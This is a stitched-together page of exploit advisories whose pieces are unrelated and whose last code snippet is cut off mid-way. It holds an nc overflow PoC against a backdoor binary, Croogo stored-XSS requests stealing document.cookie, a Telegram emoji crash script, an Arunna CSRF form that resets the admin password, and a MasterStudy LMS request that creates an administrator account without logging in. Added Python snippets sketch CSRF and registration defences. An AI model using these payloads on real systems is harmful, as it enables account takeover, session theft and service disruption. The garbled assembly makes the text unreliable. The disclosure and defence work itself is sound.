0x41414141<br />0538fbfc 
41414141 41414141 41414141 41414141 0x41414141<br />0538fc00 41414141 41414141 41414141 41414141 0x41414141<br />0538fc04 41414141 41414141 41414141 41414141 0x41414141<br />0538fc08 41414141 41414141 41414141 41414141 0x41414141<br />0538fc0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc10 41414141 41414141 41414141 41414141 0x41414141<br />0538fc14 41414141 41414141 41414141 41414141 0x41414141<br />0538fc18 41414141 41414141 41414141 41414141 0x41414141<br />0538fc1c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc20 41414141 41414141 41414141 41414141 0x41414141<br />0538fc24 41414141 41414141 41414141 41414141 0x41414141<br />0538fc28 41414141 41414141 41414141 41414141 0x41414141<br />0538fc2c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc30 41414141 41414141 41414141 41414141 0x41414141<br />0538fc34 41414141 41414141 41414141 41414141 0x41414141<br />0538fc38 41414141 41414141 41414141 41414141 0x41414141<br />0538fc3c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc40 41414141 41414141 41414141 41414141 0x41414141<br />0538fc44 41414141 41414141 41414141 41414141 0x41414141<br />0538fc48 41414141 41414141 41414141 41414141 0x41414141<br />0538fc4c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc50 41414141 41414141 41414141 41414141 0x41414141<br />0538fc54 41414141 41414141 41414141 41414141 0x41414141<br />0538fc58 41414141 41414141 41414141 41414141 0x41414141<br />0538fc5c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc60 41414141 41414141 41414141 41414141 0x41414141<br />0538fc64 41414141 41414141 41414141 41414141 0x41414141<br />0538fc68 41414141 41414141 41414141 41414141 0x41414141<br />0538fc6c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc70 41414141 41414141 41414141 41414141 0x41414141<br />0538fc74 41414141 41414141 41414141 41414141 0x41414141<br />0538fc78 41414141 41414141 41414141 41414141 0x41414141<br />0538fc7c 41414141 41414141 41414141 41414141 
0x41414141<br />0538fc80 41414141 41414141 41414141 41414141 0x41414141<br />0538fc84 41414141 41414141 41414141 41414141 0x41414141<br />0538fc88 41414141 41414141 41414141 41414141 0x41414141<br />0538fc8c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc90 41414141 41414141 41414141 41414141 0x41414141<br />0538fc94 41414141 41414141 41414141 41414141 0x41414141<br />0538fc98 41414141 41414141 41414141 41414141 0x41414141<br />0538fc9c 41414141 41414141 41414141 41414141 0x41414141<br />0538fca0 41414141 41414141 41414141 41414141 0x41414141<br />0538fca4 41414141 41414141 41414141 41414141 0x41414141<br />0538fca8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcac 41414141 41414141 41414141 41414141 0x41414141<br />0538fcb0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcb4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcb8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcbc 41414141 41414141 41414141 41414141 0x41414141<br />0538fcc0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcc4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcc8 41414141 41414141 41414141 41414141 0x41414141<br />0538fccc 41414141 41414141 41414141 41414141 0x41414141<br />0538fcd0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcd4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcd8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcdc 41414141 41414141 41414141 41414141 0x41414141<br />0538fce0 41414141 41414141 41414141 41414141 0x41414141<br />0538fce4 41414141 41414141 41414141 41414141 0x41414141<br />0538fce8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcec 41414141 41414141 41414141 41414141 0x41414141<br />0538fcf0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcf4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcf8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcfc 41414141 41414141 41414141 41414141 0x41414141<br />0538fd00 41414141 41414141 
41414141 41414141 0x41414141<br />0538fd04 41414141 41414141 41414141 41414141 0x41414141<br />0538fd08 41414141 41414141 41414141 41414141 0x41414141<br />0538fd0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd10 41414141 41414141 41414141 41414141 0x41414141<br />0538fd14 41414141 41414141 41414141 41414141 0x41414141<br />0538fd18 41414141 41414141 41414141 41414141 0x41414141<br />0538fd1c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd20 41414141 41414141 41414141 41414141 0x41414141<br />0538fd24 41414141 41414141 41414141 41414141 0x41414141<br />0538fd28 41414141 41414141 41414141 41414141 0x41414141<br />0538fd2c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd30 41414141 41414141 41414141 41414141 0x41414141<br />0538fd34 41414141 41414141 41414141 41414141 0x41414141<br />0538fd38 41414141 41414141 41414141 41414141 0x41414141<br />0538fd3c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd40 41414141 41414141 41414141 41414141 0x41414141<br />0538fd44 41414141 41414141 41414141 41414141 0x41414141<br />0538fd48 41414141 41414141 41414141 41414141 0x41414141<br />0538fd4c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd50 41414141 41414141 41414141 41414141 0x41414141<br />0538fd54 41414141 41414141 41414141 41414141 0x41414141<br />0538fd58 41414141 41414141 41414141 41414141 0x41414141<br />0538fd5c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd60 41414141 41414141 41414141 41414141 0x41414141<br />0538fd64 41414141 41414141 41414141 41414141 0x41414141<br />0538fd68 41414141 41414141 41414141 41414141 0x41414141<br />0538fd6c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd70 41414141 41414141 41414141 41414141 0x41414141<br />0538fd74 41414141 41414141 41414141 41414141 0x41414141<br />0538fd78 41414141 41414141 41414141 41414141 0x41414141<br />0538fd7c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd80 41414141 41414141 41414141 41414141 0x41414141<br />0538fd84 
41414141 41414141 41414141 41414141 0x41414141<br />0538fd88 41414141 41414141 41414141 41414141 0x41414141<br />0538fd8c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd90 41414141 41414141 41414141 41414141 0x41414141<br />0538fd94 41414141 41414141 41414141 41414141 0x41414141<br />0538fd98 41414141 41414141 41414141 41414141 0x41414141<br />0538fd9c 41414141 41414141 41414141 41414141 0x41414141<br />0538fda0 41414141 41414141 41414141 41414141 0x41414141<br />0538fda4 41414141 41414141 41414141 41414141 0x41414141<br />0538fda8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdac 41414141 41414141 41414141 41414141 0x41414141<br />0538fdb0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdb4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdb8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdbc 41414141 41414141 41414141 41414141 0x41414141<br />0538fdc0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdc4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdc8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdcc 41414141 41414141 41414141 41414141 0x41414141<br />0538fdd0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdd4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdd8 41414141 41414141 41414141 41414141 0x41414141<br />0538fddc 41414141 41414141 41414141 41414141 0x41414141<br />0538fde0 41414141 41414141 41414141 41414141 0x41414141<br />0538fde4 41414141 41414141 41414141 41414141 0x41414141<br />0538fde8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdec 41414141 41414141 41414141 41414141 0x41414141<br />0538fdf0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdf4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdf8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdfc 41414141 41414141 41414141 41414141 0x41414141<br />0538fe00 41414141 41414141 41414141 41414141 0x41414141<br />0538fe04 41414141 41414141 41414141 41414141 
0x41414141<br />0538fe08 41414141 41414141 41414141 41414141 0x41414141<br />0538fe0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fe10 41414141 41414141 41414141 41414141 0x41414141<br />0538fe14 41414141 41414141 41414141 41414141 0x41414<br /><br />STACK_COMMAND: ~6s; .ecxr ; kb<br /><br />SYMBOL_STACK_INDEX: e9<br /><br />SYMBOL_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee<br /><br />IMAGE_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 3e780ebf<br /><br />FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br /><br /><br />Exploit/PoC:<br />python -c "print('GET /'+'A'*15028 +' HTTP/1.0\r\nHost: 192.168.18.125\r\n\r\n')" | nc64.exe 192.168.18.125 80 -v<br />125.18.168.192.in-addr.arpa [192.168.18.125] 80 (http) open<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. 
Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)<br /># Date: 06/12/2021<br /># Exploit Author: Enes Özeser<br /># Vendor Homepage: https://croogo.org/<br /># Software Link: https://downloads.croogo.org/v3.0.2.zip<br /># Version: 3.0.2<br /># Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3<br /><br />==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <==<br /><br />POST /admin/file-manager/attachments/add HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730<br />Content-Length: 923<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/file-manager/attachments/add<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_method"<br /><br />POST<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_csrfToken"<br /><br />c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="file"; filename="file.txt"<br />Content-Type: <script>alert(document.cookie)</script><br 
/><br />Enes Ozeser (@enesozeser)<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_Token[fields]"<br /><br />16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_Token[unlocked]"<br /><br /><br />-----------------------------114221148012003093972656004730--<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==<br /><br />POST /admin/taxonomy/types/edit/5 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 590<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)admin/taxonomy/types/edit/5<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&<br />comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&<br 
/>format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==<br /><br />POST /admin/blocks/regions/edit/3 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 336<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/blocks/regions/edit/3<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==<br /><br />POST /admin/file-manager/attachments/edit/20 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 363<br />Origin: http://(HOST)<br 
/>Connection: close<br />Referer: http://(HOST)/admin/file-manager/attachments/edit/20<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply<br /></code></pre>
<pre><code>Document Title:<br />===============<br />Telegram Android v8.4.4 - Denial of Service (PoC)<br /><br /><br />References (Source):<br />====================<br />https://twitter.com/h4shur<br /><br /><br />Release Date:<br />=============<br />2022-01-30<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />7.8<br /><br /><br />Product & Service Introduction:<br />===============================<br />Telegram is a freeware, cross-platform, cloud-based instant messaging (IM)<br />service. The service also provides end-to-end encrypted video calling,<br />VoIP, file sharing and several other features. It was launched for iOS on<br />14 August 2013 and Android in October 2013. The servers of Telegram are<br />distributed worldwide to decrease frequent data load with five data centers<br />in different regions, while the operational center is based in Dubai in the<br />United Arab Emirates. Various client apps are available for desktop and<br />mobile platforms including official apps for Android, iOS, Windows, macOS<br />and Linux (although registration requires an iOS or Android device and a<br />working phone number). There are also two official Telegram web twin apps –<br />WebK and WebZ – and numerous unofficial clients that make use of Telegram's<br />protocol. All of Telegram's official components are open source, with the<br />exception of the server which is closed-sourced and proprietary.<br /><br />Telegram provides end-to-end encrypted voice and video calls and optional<br />end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted<br />between the app and the server, so that ISPs and other third-parties on the<br />network can't access data, but the Telegram server can. Users can send text<br />and voice messages, make voice and video calls, and share an unlimited<br />number of images, documents (2 GB per file), user locations, animated<br />stickers, contacts, and audio files. 
In January 2021, Telegram surpassed<br />500 million monthly active users. It was the most downloaded app worldwide<br />in January 2021 with 1 billion downloads globally as of late August 2021.<br /><br /><br />Abstract Advisory Information:<br />==============================<br />An independent vulnerability researcher discovered Android application<br />vulnerabilities in the Telegram application.<br /><br /><br />Affected Product(s):<br />====================<br />Vendor: telegram.org / telegram.me / t.me<br />Product: Android Telegram application (Android-Application)<br />https://telegram.org/android<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-30: Researcher Notification & Coordination (Security Researcher)<br />2022-01-30: Public Disclosure<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />local<br /><br /><br />Severity Level:<br />===============<br />medium<br /><br /><br />Disclosure Type:<br />================<br />Full Disclosure<br /><br /><br />Technical specifications and description:<br />=========================================<br />1.1<br />In version 8.4.4 of the Android Telegram application, a denial of service<br />vulnerability was discovered by H4shur. 
The vulnerability lies in this<br />messenger's handling of emoji.<br /><br />1.2<br />If you send a number of flag emojis with any text on the chat page,<br />clicking on that message crashes the application altogether, so it stops<br />providing service.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />1.1<br />A Denial of Service (DoS) attack is a type of cyberattack in which a<br />malicious person performs an attack with the aim of removing the resources<br />of a system from the reach of its users.<br />It is natural that if this attack is successful, the result will be a<br />slowdown or disabling of the equipment and resources available to the<br />victim.<br />For security demonstration or to reproduce the denial of service<br />vulnerability, follow the provided information and steps below.<br /><br /><br />PoC: Exploitation<br />1.1<br />Run the Python script; it creates a new file "outputbufferh4shur.txt".<br />1.2<br />Run Telegram Android and go to "Saved Messages" or any chat page.<br />1.3<br />Copy the content of the file "outputbufferh4shur.txt".<br />1.4<br />Paste the content of outputbufferh4shur.txt into the "Write a message..." field<br />and then type any text into this message.<br />1.5<br />Oops...<br />Telegram Crashed <3<br /><br /><br />script:<br /># 114 flag emoji; each flag is a pair of regional indicator code points<br />bufferh4shur = "🇮🇷" * 114<br />try:<br />  # open the file with an explicit UTF-8 encoding: the platform default (e.g. cp1252 on Windows)<br />  # cannot encode emoji and the write would fail with UnicodeEncodeError<br />  with open("outputbufferh4shur.txt", "w", encoding="utf-8") as f:<br />    # report the real UTF-8 byte size rather than the code point count<br />    print("[!] Creating %s bytes DOS payload...." % len(bufferh4shur.encode("utf-8")))<br />    f.write(bufferh4shur)<br />  print("[!] File Created!")<br />except OSError as e:<br />  print("File cannot be created! %s" % e)<br /><br /><br /><br />Security Risk:<br />==============<br />1.1<br />A Denial of Service (DoS) attack is a type of cyberattack in which a<br />malicious person performs an attack with the aim of removing the resources<br />of a system from the reach of its users.<br />It is natural that if this attack is successful, the result will be a<br />slowdown or disabling of the equipment and resources available to the<br />victim.<br /><br /><br />Credits & Authors:<br />==================<br />h4shur<br />Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur<br />h4shursec@gmail.com<br /></code></pre>
<pre><code># Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)<br /># Date: November 29, 2021<br /># Exploit Author: =(L_L)=<br /># Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/<br /># Vendor Homepage: https://github.com/arunna<br /># Software Link: https://github.com/arunna/arunna<br /># Version: 1.0.0<br /># Tested on: Ubuntu 20.04.2 LTS<br /><br /><!--<br />The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). <br />--><br /><br /><html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr><br /><tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr><br /><tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr><br /><tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr><br /><tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr><br /><tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr><br /><tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr><br /><tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr><br /><tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr><br /><tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr><br /><tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr><br /><tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr><br /><tr><td>tags[0]</td><td><input type="text" 
value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr><br /><tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr><br /><tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr><br /><tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr><br /><tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr><br /><tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr><br /><tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr><br /><tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr><br /><tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr><br /></table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html><br /><br /></code></pre>
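<p>The form above succeeds because the edit endpoint accepts any well-formed POST, whichever site the browser was on when it was submitted. The following is an added example of the missing control, not Arunna's code: a per-session synchronizer token that the handler checks in constant time, plus an Origin check when the browser sends that header. The field and session key names, the in-memory user store and the origin are assumptions for illustration.</p>

```python
"""Synchronizer-token CSRF check for a state-changing admin form (stdlib only)."""
import hmac
import secrets

TOKEN_FIELD = "_csrf_token"   # hypothetical hidden form field name
SESSION_KEY = "csrf_token"    # hypothetical slot in the server-side session
SITE_ORIGIN = "https://example.test"  # constructed: the origin legitimate forms are served from

# Constructed in-memory user store standing in for the application's database.
USERS = {1: {"username": "admin", "email": "admin@example.test"}}


def issue_csrf_token(session: dict) -> str:
    """Create one unguessable token per session and return it for embedding as a hidden
    field; a cross-site page cannot read it, so it cannot include it in a forged POST."""
    if SESSION_KEY not in session:
        session[SESSION_KEY] = secrets.token_urlsafe(32)
    return session[SESSION_KEY]


def verify_csrf(session: dict, form: dict, headers: dict) -> bool:
    """True only if the POST carries this session's token (compared in constant time)
    and, when the browser sent an Origin header, that origin is our own site."""
    expected = session.get(SESSION_KEY)
    submitted = form.get(TOKEN_FIELD)
    if not expected or not submitted:
        return False
    if not hmac.compare_digest(expected.encode("utf-8"), submitted.encode("utf-8")):
        return False
    origin = headers.get("Origin")  # assumes header names are already canonicalised
    if origin is not None and origin != SITE_ORIGIN:
        return False
    return True


def handle_edit_user(session: dict, form: dict, headers: dict, user_id: int = 1) -> str:
    """The edit handler: refuse with 403 before touching any data unless the CSRF check passes."""
    if not verify_csrf(session, form, headers):
        return "403 Forbidden"
    user = USERS[user_id]
    for field in ("username", "email"):
        if field in form:
            user[field] = form[field]
    return "200 OK"
```

<p>The token must be tied to the session and checked on every state-changing request; marking the session cookie SameSite is a useful second layer but does not replace the token, since older browsers and some navigation types do not honour it.</p>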
<pre><code># Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation<br /># Date: 16.02.2022<br /># Author: Numan Türle<br /># CVE: CVE-2022-0441<br /># Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/<br /># Version: <2.7.6<br /># https://www.youtube.com/watch?v=SI_O6CHXMZk<br /># https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6<br /># https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed<br /><br /><br />POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1<br />Connection: close<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4<br />Content-Type: application/json<br />Content-Length: 339<br /><br />{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}<br /> <br /><br /></code></pre>
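<p>The request above smuggles a capabilities field inside a nested registration object. The following is an added example of the server-side control that closes this class of flaw, not the plugin's code or its actual fix: an allowlist of registration fields, a recursive scan for privilege keys anywhere in the body, and a role assigned by the server. The allowlist reuses the field names from the request; the privilege key list, the default role and the sample payload are assumptions for illustration.</p>

```python
"""Server-side handling of a self-registration payload: privilege fields are never accepted
from the client, and the new account's role is assigned by the server."""
import json

# Fields a self-registration endpoint may accept (the field names seen in the request above).
REGISTRATION_ALLOWLIST = {
    "user_login", "user_email", "user_password", "user_password_re",
    "become_instructor", "privacy_policy", "degree", "expertize", "auditory",
    "additional", "additional_instructors",
}
# Keys that express privileges. Hypothetical deny list: wp_capabilities is from the request
# above; the others are generic names a reviewer would also refuse.
PRIVILEGE_KEYS = {"wp_capabilities", "capabilities", "role", "roles", "user_level"}
DEFAULT_ROLE = "subscriber"  # assumption: the least-privileged role, chosen by the server


def find_privilege_keys(obj, path=""):
    """Return dotted paths of every privilege key, however deeply nested in dicts/lists."""
    found = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            here = f"{path}.{key}" if path else key
            if key in PRIVILEGE_KEYS:
                found.append(here)
            found.extend(find_privilege_keys(value, here))
    elif isinstance(obj, list):
        for i, item in enumerate(obj):
            found.extend(find_privilege_keys(item, f"{path}[{i}]"))
    return found


def register(raw_json: str) -> dict:
    """Validate a registration request. Returns a result dict rather than creating the
    account directly so the caller can log rejections and set the HTTP status."""
    payload = json.loads(raw_json)
    privilege_paths = find_privilege_keys(payload)
    if privilege_paths:
        # Fail hard and loud rather than silently dropping: a client trying to set
        # capabilities during sign-up is a signal worth alerting on.
        return {"status": "rejected", "reason": "privilege fields in registration",
                "paths": privilege_paths}
    clean = {k: v for k, v in payload.items() if k in REGISTRATION_ALLOWLIST}
    ignored = sorted(set(payload) - REGISTRATION_ALLOWLIST)
    for required in ("user_login", "user_email", "user_password", "user_password_re"):
        if not clean.get(required):
            return {"status": "rejected", "reason": f"missing {required}"}
    if clean["user_password"] != clean["user_password_re"]:
        return {"status": "rejected", "reason": "passwords do not match"}
    # The role comes from the server's policy, never from the request body.
    user = {"user_login": clean["user_login"], "user_email": clean["user_email"], "role": DEFAULT_ROLE}
    return {"status": "created", "user": user, "ignored_fields": ignored}


# Constructed sample: the shape of the request above, with placeholder values.
SAMPLE_PRIVILEGE_REQUEST = json.dumps({
    "user_login": "USERNAME", "user_email": "EMAIL@TLD",
    "user_password": "PASSWORD", "user_password_re": "PASSWORD",
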